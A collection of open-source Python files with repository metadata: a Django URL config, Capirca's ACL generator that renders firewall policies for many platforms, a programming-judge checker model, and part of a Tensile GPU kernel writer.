"id": "e1bd0fbba8901ee91cce5b6144ef435df0b640c6",
"size": "10506",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "settingshelper.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "82928"
},
{
"name": "Dockerfile",
"bytes": "2341"
},
{
"name": "HTML",
"bytes": "2589268"
},
{
"name": "JavaScript",
"bytes": "5889543"
},
{
"name": "Jinja",
"bytes": "3693"
},
{
"name": "Less",
"bytes": "176180"
},
{
"name": "Makefile",
"bytes": "1622"
},
{
"name": "PHP",
"bytes": "2232"
},
{
"name": "PLpgSQL",
"bytes": "66704"
},
{
"name": "Python",
"bytes": "21779773"
},
{
"name": "Roff",
"bytes": "150"
},
{
"name": "Shell",
"bytes": "67473"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns(
'', # First arg to patterns is a namespace parameter.
# A handful of views in a base app.
url(r'^$', 'base_app.views.site_index'),
url(r'^logout/$', 'base_app.views.logout'),
url(r'^create_user/$', 'base_app.views.create_user'),
url(r'^login/$', 'base_app.views.login'),
# Actual pet communication views -- most of the app is here.
url(r'^pets/', include('communication_app.urls')),
# Include the views from Asheesh's Django Optimizer
url(r'^optimizer/', include('asheeshs_django_optimizer.urls')),
# Django admin.
url(r'^admin/', include(admin.site.urls)),
)
| {
"content_hash": "62ade6533e99718556850726be7a983f",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 67,
"avg_line_length": 32.90909090909091,
"alnum_prop": 0.6588397790055248,
"repo_name": "petwitter/petwitter",
"id": "07b89e6f69705404e3b972a289d336dc75f735f2",
"size": "724",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "thesite/thesite/urls.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "103"
},
{
"name": "HTML",
"bytes": "6362"
},
{
"name": "JavaScript",
"bytes": "484"
},
{
"name": "Python",
"bytes": "19551"
}
],
"symlink_target": ""
} |
"""Renders policy source files into actual Access Control Lists."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
__author__ = '[email protected]'
import copy
import difflib
import dircache
import multiprocessing
import os
import sys
import types
from lib import aclgenerator
from lib import arista
from lib import aruba
from lib import brocade
from lib import cisco
from lib import ciscoasa
from lib import ciscoxr
from lib import gce
from lib import ipset
from lib import iptables
from lib import juniper
from lib import junipersrx
from lib import naming
from lib import nftables
from lib import nsxv
from lib import packetfilter
from lib import pcap
from lib import policy
from lib import speedway
from lib import srxlo
from lib import windows_advfirewall
import gflags as flags
import logging
FLAGS = flags.FLAGS
flags.DEFINE_string(
'base_directory',
'.',
'The base directory to look for acls; '
'typically where you\'d find ./corp and ./prod')
flags.DEFINE_string(
'definitions_directory',
'./def',
'Directory where the definitions can be found.')
flags.DEFINE_string(
'policy_file',
None,
'Individual policy file to generate.')
flags.DEFINE_string(
'output_directory',
'./',
'Directory to output the rendered acls.')
flags.DEFINE_boolean(
'optimize',
False,
'Turn on optimization.',
short_name='o')
flags.DEFINE_boolean(
'recursive',
True,
'Descend recursively from the base directory rendering acls')
flags.DEFINE_list(
'ignore_directories',
'DEPRECATED, def',
"Don't descend into directories that look like this string")
flags.DEFINE_integer(
'max_renderers',
10,
'Max number of rendering processes to use.')
flags.DEFINE_boolean(
'shade_check',
False,
'Raise an error when a term is completely shaded by a prior term.')
flags.DEFINE_integer(
'exp_info',
2,
'Print a info message when a term is set to expire in that many weeks.')
class Error(Exception):
"""Base Error class."""
class P4WriteFileError(Error):
"""Error when there are issues p4 editing the destination."""
class ACLGeneratorError(Error):
"""Raised when an ACL generator has errors."""
class ACLParserError(Error):
"""Raised when the ACL parser fails."""
# Workaround http://bugs.python.org/issue1515, needed because of
# http://codereview.appspot.com/4523073/.
# (more: http://code.google.com/p/ipaddr-py/issues/detail?id=84)
# TODO(watson): Can be removed once we run under python >=2.7
def _deepcopy_method(x, memo):
return type(x)(x.im_func, copy.deepcopy(x.im_self, memo), x.im_class)
copy._deepcopy_dispatch[types.MethodType] = _deepcopy_method
def SkipLines(text, skip_line_func=False):
"""Difflib has problems with the junkline func. fix it.
Args:
text: list of the first text to scan
skip_line_func: function to use to check if we should skip a line
Returns:
ret_text: text(list) minus the skipped lines
"""
if not skip_line_func:
return text
return [x for x in text if not skip_line_func(x)]
def RenderFile(input_file, output_directory, definitions,
exp_info, write_files):
"""Render a single file.
Args:
input_file: the name of the input policy file.
output_directory: the directory in which we place the rendered file.
definitions: the definitions from naming.Naming().
exp_info: print a info message when a term is set to expire
in that many weeks.
write_files: a list of file tuples, (output_file, acl_text), to write
"""
logging.debug('rendering file: %s into %s', input_file,
output_directory)
pol = None
jcl = False
acl = False
asacl = False
aacl = False
bacl = False
eacl = False
gcefw = False
ips = False
ipt = False
spd = False
nsx = False
pcap_accept = False
pcap_deny = False
pf = False
srx = False
jsl = False
nft = False
win_afw = False
xacl = False
try:
conf = open(input_file).read()
logging.debug('opened and read %s', input_file)
except IOError as e:
logging.warn('bad file: \n%s', e)
raise
try:
pol = policy.ParsePolicy(
conf, definitions, optimize=FLAGS.optimize,
base_dir=FLAGS.base_directory, shade_check=FLAGS.shade_check)
except policy.ShadingError as e:
logging.warn('shading errors for %s:\n%s', input_file, e)
return
except (policy.Error, naming.Error):
raise ACLParserError('Error parsing policy file %s:\n%s%s' % (
input_file, sys.exc_info()[0], sys.exc_info()[1]))
platforms = set()
for header in pol.headers:
platforms.update(header.platforms)
if 'juniper' in platforms:
jcl = copy.deepcopy(pol)
if 'cisco' in platforms:
acl = copy.deepcopy(pol)
if 'ciscoasa' in platforms:
asacl = copy.deepcopy(pol)
if 'brocade' in platforms:
bacl = copy.deepcopy(pol)
if 'arista' in platforms:
eacl = copy.deepcopy(pol)
if 'aruba' in platforms:
aacl = copy.deepcopy(pol)
if 'ipset' in platforms:
ips = copy.deepcopy(pol)
if 'iptables' in platforms:
ipt = copy.deepcopy(pol)
if 'nsxv' in platforms:
nsx = copy.deepcopy(pol)
if 'packetfilter' in platforms:
pf = copy.deepcopy(pol)
if 'pcap' in platforms:
pcap_accept = copy.deepcopy(pol)
pcap_deny = copy.deepcopy(pol)
if 'speedway' in platforms:
spd = copy.deepcopy(pol)
if 'srx' in platforms:
srx = copy.deepcopy(pol)
if 'srxlo' in platforms:
jsl = copy.deepcopy(pol)
if 'windows_advfirewall' in platforms:
win_afw = copy.deepcopy(pol)
if 'ciscoxr' in platforms:
xacl = copy.deepcopy(pol)
if 'nftables' in platforms:
nft = copy.deepcopy(pol)
if 'gce' in platforms:
gcefw = copy.deepcopy(pol)
if not output_directory.endswith('/'):
output_directory += '/'
try:
if jcl:
acl_obj = juniper.Juniper(jcl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if srx:
acl_obj = junipersrx.JuniperSRX(srx, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if acl:
acl_obj = cisco.Cisco(acl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if asacl:
acl_obj = ciscoasa.CiscoASA(acl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if aacl:
acl_obj = aruba.Aruba(aacl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if bacl:
acl_obj = brocade.Brocade(bacl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if eacl:
acl_obj = arista.Arista(eacl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if ips:
acl_obj = ipset.Ipset(ips, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if ipt:
acl_obj = iptables.Iptables(ipt, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if nsx:
acl_obj = nsxv.Nsxv(nsx, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if spd:
acl_obj = speedway.Speedway(spd, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if pcap_accept:
acl_obj = pcap.PcapFilter(pcap_accept, exp_info)
RenderACL(str(acl_obj), '-accept' + acl_obj.SUFFIX, output_directory,
input_file, write_files)
if pcap_deny:
acl_obj = pcap.PcapFilter(pcap_deny, exp_info, invert=True)
RenderACL(str(acl_obj), '-deny' + acl_obj.SUFFIX, output_directory,
input_file, write_files)
if pf:
acl_obj = packetfilter.PacketFilter(pf, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if win_afw:
acl_obj = windows_advfirewall.WindowsAdvFirewall(win_afw, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if jsl:
acl_obj = srxlo.SRXlo(jsl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if xacl:
acl_obj = ciscoxr.CiscoXR(xacl, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if nft:
acl_obj = nftables.Nftables(nft, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
if gcefw:
acl_obj = gce.GCE(gcefw, exp_info)
RenderACL(str(acl_obj), acl_obj.SUFFIX, output_directory,
input_file, write_files)
# TODO(robankeny) add additional errors.
except (juniper.Error, junipersrx.Error, cisco.Error, ipset.Error,
iptables.Error, speedway.Error, pcap.Error,
aclgenerator.Error, aruba.Error, nftables.Error, gce.Error):
raise ACLGeneratorError('Error generating target ACL for %s:\n%s%s' % (
input_file, sys.exc_info()[0], sys.exc_info()[1]))
def RenderACL(acl_text, acl_suffix, output_directory, input_file, write_files):
"""Write the ACL string out to file if appropriate.
Args:
acl_text: Rendered ouput of an ACL Generator
acl_suffix: File suffix to append to output filename
output_directory: The directory to write the output file
input_file: The name of the policy file that was used to render ACL
write_files: a list of file tuples, (output_file, acl_text), to write
"""
output_file = os.path.join(output_directory, '%s%s') % (
os.path.splitext(os.path.basename(input_file))[0], acl_suffix)
if FilesUpdated(output_file, acl_text):
logging.info('file changed: %s', output_file)
write_files.append((output_file, acl_text))
else:
logging.debug('file not changed: %s', output_file)
def FilesUpdated(file_name, file_string):
"""Diff the rendered acl with what's already on disk."""
try:
conf = open(file_name).read()
except IOError:
return True
p4_id = '$I d:'.replace(' ', '')
p4_date = '$Da te:'.replace(' ', '')
p4_revision = '$Rev ision:'.replace(' ', '')
p4_tags = lambda x: p4_id in x or p4_date in x or p4_revision in x
checked_in_text = SkipLines(conf.split('\n'), skip_line_func=p4_tags)
new_text = SkipLines(file_string.split('\n'), skip_line_func=p4_tags)
diff = difflib.unified_diff(checked_in_text, new_text)
# why oh why is it so hard to simply tell if two strings/lists are different?
if not difflib.IS_CHARACTER_JUNK(''.join(diff)):
logging.debug('\n'.join(diff))
return True
return False
def DescendRecursively(input_dirname, output_dirname, definitions, depth=1):
"""Recursively descend from input_dirname looking for policy files to render.
Args:
input_dirname: the base directory.
output_dirname: where to place the rendered files.
definitions: naming.Naming object
depth: integer, used for outputing '---> rendering prod/corp-backbone.jcl'
Returns:
the files that were found
"""
# p4 complains if you try to edit a file like ./corp//corp-isp.jcl
input_dirname = input_dirname.rstrip('/')
output_dirname = output_dirname.rstrip('/')
files = []
# calling all directories
for curdir in [x for x in dircache.listdir(input_dirname) if
os.path.isdir(input_dirname + '/' + x)]:
# be on the lookout for a policy directory
if curdir == 'pol':
for input_file in [x for x in dircache.listdir(input_dirname + '/pol')
if x.endswith('.pol')]:
files.append({'in_file': os.path.join(input_dirname, 'pol', input_file),
'out_dir': output_dirname,
'defs': definitions})
else:
# so we don't have a policy directory, we should check if this new
# directory has a policy directory
if curdir in FLAGS.ignore_directories:
continue
logging.warn('-' * (2 * depth) + '> %s' % (
input_dirname + '/' + curdir))
files_found = DescendRecursively(input_dirname + '/' + curdir,
output_dirname + '/' + curdir,
definitions, depth + 1)
logging.warn('-' * (2 * depth) + '> %s (%d pol files found)' % (
input_dirname + '/' + curdir, len(files_found)))
files.extend(files_found)
return files
# TODO(robankeny): Clean up this area to make it easier to abstract our writer.
def WriteFiles(write_files):
"""Writes files to disk.
Args:
write_files: List of file names and strings.
"""
if write_files:
logging.info('writing %d files to disk...', len(write_files))
else:
logging.info('no files changed, not writing to disk')
for output_file, file_string in write_files:
try:
output = open(output_file, 'w')
except IOError:
logging.warn('error while writing file: %s', output_file)
raise
logging.info('writing file: %s', output_file)
output.write(file_string)
output.flush()
def main(args):
FLAGS(args)
logging.debug('binary: %s\noptimize: %d\base_directory: %s\n'
'policy_file: %s\nrendered_acl_directory: %s',
str(sys.argv[0]),
int(FLAGS.optimize),
str(FLAGS.base_directory),
str(FLAGS.policy_file),
str(FLAGS.output_directory))
definitions = None
try:
definitions = naming.Naming(FLAGS.definitions_directory)
except naming.NoDefinitionsError:
logging.fatal('bad definitions directory: %s', FLAGS.definitions_directory)
# thead-safe list for storing files to write
manager = multiprocessing.Manager()
write_files = manager.list()
with_errors = False
if FLAGS.policy_file:
# render just one file
logging.info('rendering one file')
RenderFile(FLAGS.policy_file, FLAGS.output_directory, definitions,
FLAGS.exp_info, write_files)
else:
# render all files in parallel
logging.info('finding policies...')
pols = []
pols.extend(DescendRecursively(FLAGS.base_directory, FLAGS.output_directory,
definitions))
pool = multiprocessing.Pool(processes=FLAGS.max_renderers)
results = []
for x in pols:
results.append(pool.apply_async(RenderFile,
args=(x.get('in_file'),
x.get('out_dir'),
definitions,
FLAGS.exp_info,
write_files)))
pool.close()
pool.join()
for result in results:
try:
result.get()
except (ACLParserError, ACLGeneratorError) as e:
with_errors = True
logging.warn('\n\nerror encountered in rendering process:\n%s\n\n', e)
# actually write files to disk
WriteFiles(write_files)
if with_errors:
logging.warn('done, with errors.')
sys.exit(1)
else:
logging.info('done.')
if __name__ == '__main__':
main(sys.argv)
| {
"content_hash": "79750cfc1bde75f9eabd7bb478ce74b2",
"timestamp": "",
"source": "github",
"line_count": 487,
"max_line_length": 80,
"avg_line_length": 31.917864476386036,
"alnum_prop": 0.6405043746783324,
"repo_name": "ryantierney513/capirca",
"id": "e179cf0eec4fa59edcab6ff797fd2160e17fbda3",
"size": "16164",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aclgen.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "PHP",
"bytes": "736"
},
{
"name": "Python",
"bytes": "920361"
},
{
"name": "Shell",
"bytes": "909"
}
],
"symlink_target": ""
} |
"""Checker models"""
import tempfile
import os
from subprocess import Popen, PIPE, STDOUT
from pysistem import app, db
from pysistem.problems.model import Problem
from pysistem.submissions.const import STR_RESULT, STR_STATUS, STATUS_CWAIT
from pysistem.submissions.const import STATUS_WAIT, STATUS_COMPILEFAIL, STATUS_DONE
from pysistem.submissions.const import STATUS_ACT, STATUS_CHECKING, STATUS_COMPILING
from pysistem.submissions.const import RESULT_OK, RESULT_IE, RESULT_SV, RESULT_ML
from pysistem.submissions.const import RESULT_TL, RESULT_RE, RESULT_WA, RESULT_PE
try:
from pysistem.conf import DIR
except: # pragma: no cover
from pysistem.conf_default import DIR
class Checker(db.Model):
"""A submission runner
Fields:
id -- unique checker identifier
name -- checker name
source -- checker source
status -- checker status, see pysistem.submissions.const
compile_log -- compilation log produced by compiler
Relationships:
problem, problem_id -- problem, whose checker it is
compiler, compiler_id -- compiler used to compile this checker
"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(256))
source = db.Column(db.Text)
status = db.Column(db.Integer)
compile_log = db.Column(db.Text)
problem_id = db.Column(db.Integer, db.ForeignKey('problem.id'))
compiler_id = db.Column(db.Integer, db.ForeignKey('compiler.id'))
def __init__(self, name='', source='', problem=None):
self.name = name
self.source = source
self.status = STATUS_CWAIT
self.compile_log = ''
if isinstance(problem, int): # pragma: no cover
problem = Problem.query.get(problem)
self.problem = problem
def __repr__(self):
return '<Checker %r>' % self.name
def get_exe_path(self):
"""Return the pathname of checker's binary file"""
STORAGE = app.config['STORAGE']
return STORAGE + '/checkers_bin/' + str(self.id)
def get_ext(self):
"""Get checker source file extension"""
return self.compiler.lang
def get_src_path(self):
return DIR + '/work/work/checker_%d.%s' % (self.id, self.get_ext())
def get_result(self):
if self.status in [STATUS_DONE, STATUS_ACT]:
return '<span class="text-success">%s</span>' % STR_RESULT[RESULT_OK]
if self.status in [STATUS_COMPILEFAIL]:
return '<span class="text-danger">%s</span>' % STR_STATUS[STATUS_COMPILEFAIL]
return STR_STATUS[self.status] # pragma: no cover
def compile(self):
"""Compile checker, must be called before using checker on every checking machine"""
if self.status not in [STATUS_CWAIT, STATUS_COMPILEFAIL, STATUS_WAIT]: # pragma: no cover
return False, b'', b''
self.status = STATUS_COMPILING
db.session.commit()
with open(self.get_src_path(), "w") as file:
file.write(self.source)
success, stdout = self.compiler.compile(self.get_src_path(), self.get_exe_path())
try:
os.remove(self.get_src_path())
except: pass
self.compile_log = stdout
if success:
self.status = STATUS_DONE
self.set_act()
else:
self.status = STATUS_COMPILEFAIL
db.session.commit()
return success, stdout
def set_act(self):
"""Set as active checker for problem, works only if checker compiled successfully"""
if self.status == STATUS_DONE:
self.problem.checkers.filter(Checker.status == STATUS_ACT) \
.update({"status": STATUS_DONE})
self.status = STATUS_ACT
db.session.commit()
return True
else:
return False
def check_test(self, submission, test):
"""Run submission on test. For internal use.
Arguments:
submission -- Submission object for checking
test -- TestPair object for checking
Returns:
Tuple: (Checker output, Submission output)
"""
submission.current_test_id = test.id
cstdout = b''
result, stdout, stderr = submission.run(test.input, submission.problem.time_limit,
submission.problem.memory_limit,
commit_waiting=False)
subres = RESULT_OK
if result & 8:
subres = RESULT_IE
elif result & 16:
subres = RESULT_SV
elif result & 4:
subres = RESULT_ML
elif result & 1:
subres = RESULT_TL
elif result & 2:
subres = RESULT_RE
if subres == RESULT_OK:
# NOTHING WRONG: CHECK FOR OK/WA/PE
input_path = tempfile.gettempdir() + '/pysistem_checker_input_' + \
str(submission.id) + '_' + str(test.id)
output_path = tempfile.gettempdir() + '/pysistem_checker_output_' + \
str(submission.id) + '_' + str(test.id)
pattern_path = tempfile.gettempdir() + '/pysistem_checker_pattern_' + \
str(submission.id) + '_' + str(test.id)
with open(input_path, 'w') as input_file, \
open(output_path, 'w') as output_file, \
open(pattern_path, 'w') as pattern_file:
print(test.input, file=input_file)
print(test.pattern, file=pattern_file)
print(stdout.decode(), file=output_file)
cmd = [self.get_exe_path(), input_path, output_path, pattern_path]
proc = Popen(cmd, stdout=PIPE, stderr=STDOUT)
cstdout, cstderr = proc.communicate()
returncode = proc.returncode
os.remove(input_path)
os.remove(output_path)
os.remove(pattern_path)
if returncode in [0, 0xAC]:
subres = RESULT_OK
elif returncode in [1, 0xAB]:
subres = RESULT_WA
elif returncode in [2, 0xAA]:
subres = RESULT_PE
else:
subres = RESULT_IE
submission.result = subres
if submission.result == RESULT_OK:
submission.score += test.test_group.score_per_test
return cstdout.decode(), stdout.decode()
def check(self, submission, session=None):
"""(Re)check submission. For internal use.
Arguments:
submission -- Submission object for checking
session -- SQLAlchemy session object to use. Default -- db.session
Returns:
pysistem.submissions.const -- Submission's result
"""
print("Starting checking", submission);
session = session or db.session
from pysistem.submissions.model import SubmissionLog
submission.result = RESULT_OK
submission.status = STATUS_CHECKING
submission.score = 0
submission.check_log = ''
last_result = RESULT_OK
for submission_log in session.query(SubmissionLog).filter(
SubmissionLog.submission_id == submission.id):
session.remove(submission_log)
session.commit()
from pysistem.test_pairs.model import TestPair, TestGroup
for test_group in session.query(TestGroup) \
.filter(self.problem_id == TestGroup.problem_id):
all_passed = True
for test in session.query(TestPair) \
.filter(test_group.id == TestPair.test_group_id):
cstdout, stdout = self.check_test(submission, test)
submission_log = session.query(SubmissionLog).filter(db.and_(
SubmissionLog.submission_id == submission.id,
SubmissionLog.test_pair_id == test.id
)).first() or SubmissionLog(submission=submission, test_pair=test)
session.add(submission_log)
submission_log.result = submission.result
submission_log.log = cstdout
submission_log.stdout = stdout
session.commit()
if submission.result != RESULT_OK:
all_passed = False
if last_result == RESULT_OK:
last_result = submission.result
if not test_group.check_all:
break
if all_passed:
submission.score += test_group.score
else:
break
submission.current_test_id = 0
submission.result = last_result
submission.done()
return submission.result
| {
"content_hash": "65a7d3909d9ab4181fedc1777a98fb00",
"timestamp": "",
"source": "github",
"line_count": 239,
"max_line_length": 97,
"avg_line_length": 36.35146443514645,
"alnum_prop": 0.58298802946593,
"repo_name": "TsarN/pysistem",
"id": "584adf2c8edde07b61871f3abe51c6e31104fe67",
"size": "8713",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pysistem/checkers/model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "112692"
},
{
"name": "CSS",
"bytes": "7381"
},
{
"name": "HTML",
"bytes": "90904"
},
{
"name": "JavaScript",
"bytes": "904"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Pascal",
"bytes": "51054"
},
{
"name": "Python",
"bytes": "247159"
}
],
"symlink_target": ""
} |
################################################################################
#
# Copyright (C) 2020-2022 Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
################################################################################
from copy import deepcopy
from .Common import globalParameters, CHeader
from .DataType import DataType
from .KernelWriterBase import KernelWriterBase
class KernelWriterBetaOnly(KernelWriterBase):
def __init__(self, state):
super().__init__()
self.state["ProblemType"] = deepcopy(state["ProblemType"])
self.state["_GlobalAccumulation"] = state["_GlobalAccumulation"]
# derive parameter
self.language = "HIP"
self.kernelName = self.getKernelName()
# determine chars for fast access
self.indexChars = []
for i in range(0, len(globalParameters["IndexChars"])):
self.indexChars.append(globalParameters["IndexChars"][i])
self.indexChars[self.state["ProblemType"]["Index0"]] = "0" + self.indexChars[self.state["ProblemType"]["Index0"]]
self.indexChars[self.state["ProblemType"]["Index1"]] = "1" + self.indexChars[self.state["ProblemType"]["Index1"]]
self.tileChar0 = self.indexChars[self.state["ProblemType"]["Index0"]]
self.tileChar1 = self.indexChars[self.state["ProblemType"]["Index1"]]
def functionSignature(self):
kStr = ""
# self.state name
kStr += self.endLine
kStr += "extern \"C\"" + self.endLine
kStr += "__global__ "
kStr += "void %s" % ( self.kernelName )
kStr += "(" + self.endLine
# pointers
ptrStr = self.state["ProblemType"]["DestDataType"].toDevice(self.language)
if self.state["_GlobalAccumulation"]:
ptrStr = self.state["ProblemType"]["ComputeDataType"].toDevice(self.language)
isStridedBuffer = self.state["ProblemType"]["StridedBatched"] or self.state["_GlobalAccumulation"]
ptrStr += "" if isStridedBuffer else "*"
batch = "" if isStridedBuffer else "Batch"
kStr += " " + ptrStr + " * " + batch + "D," + self.endLine
ptrStr = self.state["ProblemType"]["DestDataType"].toDevice(self.language)
isStridedBuffer = self.state["ProblemType"]["StridedBatched"]
ptrStr += "" if isStridedBuffer else "*"
batch = "" if isStridedBuffer else "Batch"
kStr += " " + ptrStr + " const * " + batch + "C," + self.endLine
# strides
firstStrideCD = 1
if self.state["ProblemType"]["UseInitialStridesCD"]:
firstStrideCD = 0
lastStrideC = self.state["ProblemType"]["NumIndicesC"]
for i in range(firstStrideCD, lastStrideC):
kStr += " unsigned int const strideD%s,%s" % (self.indexChars[i], self.endLine)
for i in range(firstStrideCD, lastStrideC):
kStr += " unsigned int const strideC%s,%s" % (self.indexChars[i], self.endLine)
# sizes
for i in range(0, self.state["ProblemType"]["NumIndicesC"]):
kStr += " unsigned int const size%s,%s" % (self.indexChars[i], self.endLine)
# offset
kStr += " unsigned int offsetD,%s" % self.endLine
kStr += " unsigned int offsetC,%s" % self.endLine
# beta
kStr += " %s const beta)%s" % (self.state["ProblemType"]["ComputeDataType"].toDevice(self.language), self.endLine )
return kStr
##############################################################################
# Kernel Body Beta-Only
##############################################################################
def kernelBodyBetaOnly(self):
problemType = self.state["ProblemType"]
globalAccum = self.state["_GlobalAccumulation"]
kStr = ""
kStr += "{%s" % self.endLine
########################################
# defined initial strides
firstStride = 0
if problemType["UseInitialStridesCD"]:
# no strides #defined
lastStrideC = 0
assert 0 # need to fix beta-clear routine to pass initial stride parms
else:
# #define initial stride
kStr += "/* hard-coded initial strides */%s" % self.endLine
lastStrideC = 1
for i in range(firstStride, lastStrideC):
kStr += "#define strideD" + self.indexChars[i] + " 1" + self.endLine
for i in range(firstStride, lastStrideC):
kStr += "#define strideC" + self.indexChars[i] + " 1" + self.endLine
########################################
# GLOBAL_D()
kStr += "#define GLOBAL_D(IDX%s" % self.indexChars[0]
for i in range(1, problemType["NumIndicesC"]):
kStr += ", IDX%s" % self.indexChars[i]
indexChar = self.indexChars[0]
kStr += ") (( (IDX%s)*strideD%s" % (indexChar, indexChar)
for i in range(1, problemType["NumIndicesC"]):
indexChar = self.indexChars[i]
kStr += " + (IDX%s)*strideD%s" % (indexChar, indexChar)
kStr += " ))" + self.endLine
# GLOBAL_C()
kStr += "#define GLOBAL_C(IDX%s" % self.indexChars[0]
for i in range(1, problemType["NumIndicesC"]):
kStr += ", IDX%s" % self.indexChars[i]
indexChar = self.indexChars[0]
kStr += ") (( (IDX%s)*strideC%s" % (indexChar, indexChar)
for i in range(1, problemType["NumIndicesC"]):
indexChar = self.indexChars[i]
kStr += " + (IDX%s)*strideC%s" % (indexChar, indexChar)
kStr += " ))" + self.endLine
########################################
# multi buffers GSU: Accumulate all GSU buffer
indexChar = self.indexChars[0]
kStr += " uint64_t id = %s(0);%s" % (self.getGlobalIdStr, self.endLine)
kStr += " if (id >= (size%s" % self.indexChars[0]
for i in range(1, problemType["NumIndicesC"]):
kStr += "*size%s" % self.indexChars[i]
kStr += "))%s" % self.endLine
kStr += " return;%s" % self.endLine
kStr += self.endLine
kStr += " uint64_t id0"
for i in range(1, problemType["NumIndicesC"]):
kStr += ", id%d" % i
kStr += ";%s" % self.endLine
for i in range(0, problemType["NumIndicesC"]):
kStr += " id%d = id %% size%s;%s" % (i, self.indexChars[i], self.endLine)
kStr += " id = id / size%s;%s" % (self.indexChars[i], self.endLine)
nonTileFreeIndices = []
# apply batch
if not self.state["ProblemType"]["StridedBatched"]:
nonTileFreeIndices = list(range(0, self.state["ProblemType"]["NumIndicesC"]))
nonTileFreeIndices.remove(self.state["ProblemType"]["Index0"])
nonTileFreeIndices.remove(self.state["ProblemType"]["Index1"])
kStr += self.endLine
kStr += " uint64_t wg = 0"
batchStride = "1"
for i in nonTileFreeIndices:
kStr += " + id%d * %s " % (i, batchStride)
batchStride += " * size%s" % self.indexChars[i]
kStr += ";" + self.endLine
if not self.state["_GlobalAccumulation"]:
ptrStr = self.state["ProblemType"]["DestDataType"].toDevice(self.language)
kStr += " " + ptrStr + " * D = BatchD[wg];" + self.endLine
ptrStr = self.state["ProblemType"]["DestDataType"].toDevice(self.language)
zeroStr = self.state["ProblemType"]["ComputeDataType"].zeroString(self.language, 1)
kStr += " " + ptrStr + f" const* C = (beta == {zeroStr}) ? nullptr : BatchC[wg];" + self.endLine
# apply offset
kStr += self.endLine
if not self.state["_GlobalAccumulation"]:
kStr += " D = D + offsetD;" + self.endLine
kStr += " C = C + offsetC;" + self.endLine
kStr += self.endLine
########################################
# D index
kStr += " %s idxD = GLOBAL_D( (%s)" % (self.uint64Str, self.uint64Str)
for i in range(problemType["NumIndicesC"]):
tmpStr = ''
if self.state["_GlobalAccumulation"]:
tmpStr = 'id%d' % i
elif i in nonTileFreeIndices:
tmpStr = '0'
else:
tmpStr = 'id%d' % i
kStr += ', ' if i else ''
kStr += tmpStr
kStr += ");%s" % (self.endLine)
# C index
kStr += " %s idxC = GLOBAL_C( (%s)" % (self.uint64Str, self.uint64Str)
for i in range(problemType["NumIndicesC"]):
kStr += ', ' if i else ''
kStr += '0' if i in nonTileFreeIndices else ('id%d' % i)
kStr += ");%s" % (self.endLine)
########################################
# zero
if globalAccum:
ptrStr = problemType["ComputeDataType"].toDevice(self.language)
if problemType["DataType"].isHalf() and problemType["HighPrecisionAccumulate"]:
ptrStr = DataType('single').toDevice(self.language)
else:
ptrStr = problemType["DataType"].toDevice(self.language)
kStr += "#define SCALAR_ZERO ((%s)(0))%s" % (ptrStr, self.endLine )
########################################
# zero
computeType = problemType["ComputeDataType"].toDevice(self.language)
kStr += " if( beta == (%s)0) {%s" % (computeType, self.endLine)
kStr += " D[idxD] = SCALAR_ZERO;%s" % self.endLine
kStr += " } else {%s" % self.endLine
kStr += " D[idxD] = ((%s)(C[idxC])) * beta;%s" % (computeType, self.endLine)
